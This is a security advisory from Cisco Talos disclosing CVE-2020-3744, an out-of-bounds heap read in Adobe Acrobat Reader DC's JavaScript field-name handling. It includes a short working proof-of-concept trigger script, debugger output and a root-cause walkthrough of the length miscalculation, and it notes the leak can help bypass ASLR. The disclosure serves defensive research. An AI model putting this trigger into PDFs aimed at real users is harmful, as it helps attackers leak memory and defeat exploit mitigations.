Talos Vulnerability Report

TALOS-2019-0959

Adobe Acrobat Reader DC Javascript Field Name Information Leak

February 11, 2020
CVE Number

CVE-2020-3744

Summary

A specific JavaScript code embedded in a PDF file can lead to information leak when opening a PDF document in Adobe Acrobat Reader DC 2019.021.20048. With careful memory manipulation, this can lead to sensitive information disclose which could be abused when exploiting another vulnerability to bypass mitigations. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

Tested Versions

Adobe Acrobat Reader DC 2019.021.20048

Product URLs

https://get.adobe.com/reader/

CVSSv3 Score

6.8 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:H

CWE

CWE-122: Heap-based Buffer Overflow

Details

Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.

Adobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and poses additional attack surface. Javascript API allows creation of additional field and a field name length calculation error can result in out of bounds memory being read. Javascript code that triggers this vulnerability is as follows:

this.addField( Array(0x20000-9).join("a") +  "\." + "bbbb", "radiobutton", 0, [0,0,0,0] );
var s =  getNthFieldName(0);

console.println(s.length);
var sh = "";
try{
    for(var j = 0 ; j < s.length; j++){
        if(s.charCodeAt(j) == 0x61 || s.charCodeAt(j) == 0x62 ) continue;
        sh += ""+s.charCodeAt(j).toString(16);
    }
    
}catch(e){}

The above code creates a PDF form field with a specific, large, name. Then, when getting the field name, out of bounds memory is leaked and printed. Note that, in general, this won’t cause a crash as it will just read out of bounds memory. Also, since the length of the printed field is determined by null termination, if the first byte of leaked memory happens to be null, no bytes will be leaked. To observe the crash, PageHeap needs to be enabled. In that case we observe the following:

(1ac8.1e8c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=52bf0ff6 ebx=0000ffff ecx=0000fff6 edx=0000ffff esi=52be1000 edi=52c49009
eip=66602e8e esp=00d9c964 ebp=00d9c998 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
VCRUNTIME140!memcpy+0x4e:
66602e8e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
0:000> dd esi
52be1000  ???????? ???????? ???????? ????????
52be1010  ???????? ???????? ???????? ????????
52be1020  ???????? ???????? ???????? ????????
52be1030  ???????? ???????? ???????? ????????
52be1040  ???????? ???????? ???????? ????????
52be1050  ???????? ???????? ???????? ????????
52be1060  ???????? ???????? ???????? ????????
52be1070  ???????? ???????? ???????? ????????
0:000> dd edi
52c49009  61616161 61616161 61616161 61616161
52c49019  61616161 c0616161 c0c0c0c0 c0c0c0c0
52c49029  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49039  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49049  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49059  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49069  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49079  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0:000> ?ecx
Evaluate expression: 65526 = 0000fff6
0:000> kv 5
 # ChildEBP RetAddr  Args to Child              
00 00d9c968 65964583 52c49000 52be0ff7 0000ffff VCRUNTIME140!memcpy+0x4e (FPO: [3,0,2]) (CONV: cdecl) [d:\agent\_work\3\s\src\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 194] 
WARNING: Stack unwind information not available. Following frames may be wrong.
01 00d9c998 65a13ff9 4c13cfe8 4c09cfe8 0001fff7 AcroForm!DllUnregisterServer+0x26d73
02 00d9c9ec 65a1308a 00d9ca9c 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
03 00d9cab4 659a4b22 4a580fe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
04 00d9cb38 658fa7a0 1d168bd8 4a580fe8 49330ff0 AcroForm!DllUnregisterServer+0x67312

Above debugger output shows a crash during a memcpy call. The crash is due to invalid memory read access violation (as esi points out of bounds) and it shows that edi is still valid. Counter ecx also shows that there are 0xfff6 bytes to be copied. To understand what is going on, we need to take a step back to a calling function sub_20AA4483:

if ( srcObj->_obj_type_ == eUNICODE )
{
  if ( start_offset1 < pstrend && !(copy_size & 1) )
  {
    realloc_sub_2086737B(destObj, pstrend - start_offset1 + 5);
    *destObj->strbuf = 0xFE;
    destObj->strbuf[1] = 0xFF;
    destObj->current_length = copy_size + 2;
    memcpy(destObj->strbuf + 2, &srcObj->strbuf[start_offset], copy_size);
    memset(&destObj->strbuf[destObj->current_length], 0, 2u);
  }
}
else
{
  realloc_sub_2086737B(destObj, pstrend - start_offset1 + 2);
  destObj->current_length = copy_size;
  memcpy(destObj->strbuf, &srcObj->strbuf[start_offset], copy_size);
  memset(&destObj->strbuf[destObj->current_length], 0, 1u);
}

In the above, we can see that if the string type is not unicode, the code proceeds to reallocate the necessary memory buffer in the destination object and then proceeds to memcpy the source string into it, and even properly null terminates it. Two things influence this vulnerable memcpy call. Variable start_offset and copy_size. Both start_offset and copy_size are influenced by this function’s arguments. Taking one step backwards to the calling function reveals the following simplified code of function sub_20B53CC7:

dotOffset = memchar__sub_20AA38A7(srcObj, '.', 1);
if ( dotOffset == -1 ){...}
else
{
  ...
  sub_20AA4483(dstObj, srcObj, 0, dotOffset);
  ...
  sub_20AA4483(dstObj, srcObj, dotOffset + 1, 0xFFFF);
}

In the above, we see two subsequent calls to function sub_20AA4483 that ends up calling mempcy in a vulnerable way. But first, we see a call to a memchr-like function that searches the source string for a . character. This is significant because Adobe AcroForms specification tells us that forms and fields can have hierarchy trees which can be represented by . delimited names. Function sub_20B53CC7 is actually recursively walking the field name and splitting the names by dots. The above is significant to this vulnerability because the last call of function sub_20AA4483, which is processing the leaf part of the field name, has a correct dot offset, but a constant size parameter of 0xFFFF. These two end up affecting our variables start_offset (which is exactly the same as dot offset) and copy_size (which depends on the bytes copied so far AND constant 0xFFFF).

Additionally, string representation in memory in this case is as follows:

struct fname_string {
    int obj_type,
    char *strbuff,
    size_t current_length,
    size_t buffer_size
}

Object type identifies unicode vs ANSI strings, strbuff points the the beginning of the string, while the buffer size is the size of total memory allocation and current_length represents how much of that buffer is currently used. When we examine one of those objects in memory, we can see :

0:000> dd 4c09cfe8 
4c09cfe8  00000001 52bc1000 0001fffb 00020000
4c09cff8  00000000 00000000 ???????? ????????
4c09d008  ???????? ???????? ???????? ????????
4c09d018  ???????? ???????? ???????? ????????
4c09d028  ???????? ???????? ???????? ????????
4c09d038  ???????? ???????? ???????? ????????
4c09d048  ???????? ???????? ???????? ????????
4c09d058  ???????? ???????? ???????? ????????
0:000> dd 52bc1000 
52bc1000  61616161 61616161 61616161 61616161
52bc1010  61616161 61616161 61616161 61616161
52bc1020  61616161 61616161 61616161 61616161
52bc1030  61616161 61616161 61616161 61616161
52bc1040  61616161 61616161 61616161 61616161
52bc1050  61616161 61616161 61616161 61616161
52bc1060  61616161 61616161 61616161 61616161
52bc1070  61616161 61616161 61616161 61616161

For the above example, 0x20000 is the total buffer size, 0x1fffb is current string length and 0x52bc1000 is the string pointer. We can conclude that for very large strings, Acrobat actually allocates buffers in multiples of 0x10000 or 64kb. Note that 0xFFFF constant is just one byte shy of 0x10000.

Now, getting back to the vulnerable memcpy call, we need to determine where the copy_size value is calculated. This calculation happens in in a couple of steps, but the most significant part is in function sub_208720F2 which is calculating an offset into the string taking account of the string type. This function returns the offset that is supposed to limit copy_size, but due to an integer overflow, a bigger value is returned. This essentially results in constant 0xFFFF being added to the current string offset. In most cases, since large strings are allocated in multiples of 0x10000 bytes, this overflow doesn’t cause a problem, but with specially constructed field names we can force a boundary condition which can lead to up to 0xFFFE bytes being read out of bounds. The string constructed in our PoC does just that:

Array(0x20000-9).join("a") +  "\." + "bbbb"

It makes sure a 0x20000 bytes long chunk of memory is allocated, but makes it almost full. If we break the process just before the memcpy we can expect the parameters:

eax=52128ff7 ebx=0000ffff ecx=65727471 edx=00000040 esi=4b784fe8 edi=4b888fe8
eip=6596457e esp=0053c86c ebp=0053c894 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroForm!DllUnregisterServer+0x26d6e:
6596457e e8aaa8dbff      call    AcroForm+0x5ee2d (6571ee2d)
0:000> kv 4
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0053c894 65a13ff9 4b784fe8 4b888fe8 0001fff7 AcroForm!DllUnregisterServer+0x26d6e
01 0053c8e8 65a1308a 0053c998 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
02 0053c9b0 659a4b22 4915cfe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
03 0053ca34 658fa7a0 1c20abd8 4915cfe8 4910cff0 AcroForm!DllUnregisterServer+0x67312
0:000> dd esp
0053c86c  52241000 52128ff7 0000ffff 4b784fe8
0053c87c  00010000 0000000d c0010000 4b784fe8
0053c88c  0001fff7 0002fff6 0053c8e8 65a13ff9
0053c89c  4b784fe8 4b888fe8 0001fff7 0000ffff
0053c8ac  c0010000 0000000b 00000056 c0010000
0053c8bc  0000000d 0000000b c0010000 491d4fb0
0053c8cc  491d4fb0 670544f0 00000013 80010000
0053c8dc  0001fff6 4b784fe8 00000014 0053c9b0

The first parameter, destination buffer, is big enough:

0:000> !heap -p  -a poi(esp)
    address 52241000 found in
    _DPH_HEAP_ROOT @ 761000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                4f1b39f4:         52241000            20000 -         52240000            22000
    6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
    77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
    77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
    77c92953 ntdll!RtlReAllocateHeap+0x00000043
    77552620 ucrtbase!_realloc_base+0x00000030
    66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
    657279ba AcroForm!PlugInMain+0x0000769a
    65727451 AcroForm!PlugInMain+0x00007131
    65964570 AcroForm!DllUnregisterServer+0x00026d60
    65a13ff9 AcroForm!DllUnregisterServer+0x000d67e9
    65a1308a AcroForm!DllUnregisterServer+0x000d587a
    659a4b22 AcroForm!DllUnregisterServer+0x00067312
    658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90
0:000> ?poi(esp+4) - 52109000            
Evaluate expression: 131063 = 0001fff7

Second parameter already starts at a large offset from its beginning (0x0001fff7 actually), and is of the same size.

0:000> !heap -p  -a poi(esp+4)
    address 52128ff7 found in
    _DPH_HEAP_ROOT @ 761000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                4ecb2c30:         52109000            20000 -         52108000            22000
          unknown!fillpattern
    6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
    77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
    77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
    77c92953 ntdll!RtlReAllocateHeap+0x00000043
    77552620 ucrtbase!_realloc_base+0x00000030
    66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
    657279ba AcroForm!PlugInMain+0x0000769a
    65727451 AcroForm!PlugInMain+0x00007131
    65727723 AcroForm!PlugInMain+0x00007403
    657276d4 AcroForm!PlugInMain+0x000073b4
    65a12f1f AcroForm!DllUnregisterServer+0x000d570f
    659a4b22 AcroForm!DllUnregisterServer+0x00067312
    658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90

And finally, the size of the copy is 0xFFFF.

0:000> ?poi(esp+8)
Evaluate expression: 65535 = 0000ffff

Executing this memcpy call results in 0xFFF8 bytes being read out of bounds into the destination string. This destination string is later used as part of a field name and can be inspected via Javascript, thus leaking heap metadata.

By carefully controlling the allocations prior to and after the source string, we can put other sensitive process information in the suitable memory position and then leak it through this vulnerability. This can be used to break ASLR and other mitigations.

Timeline

2019-11-26 - Vendor Disclosure
2020-02-11 - Public Release

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.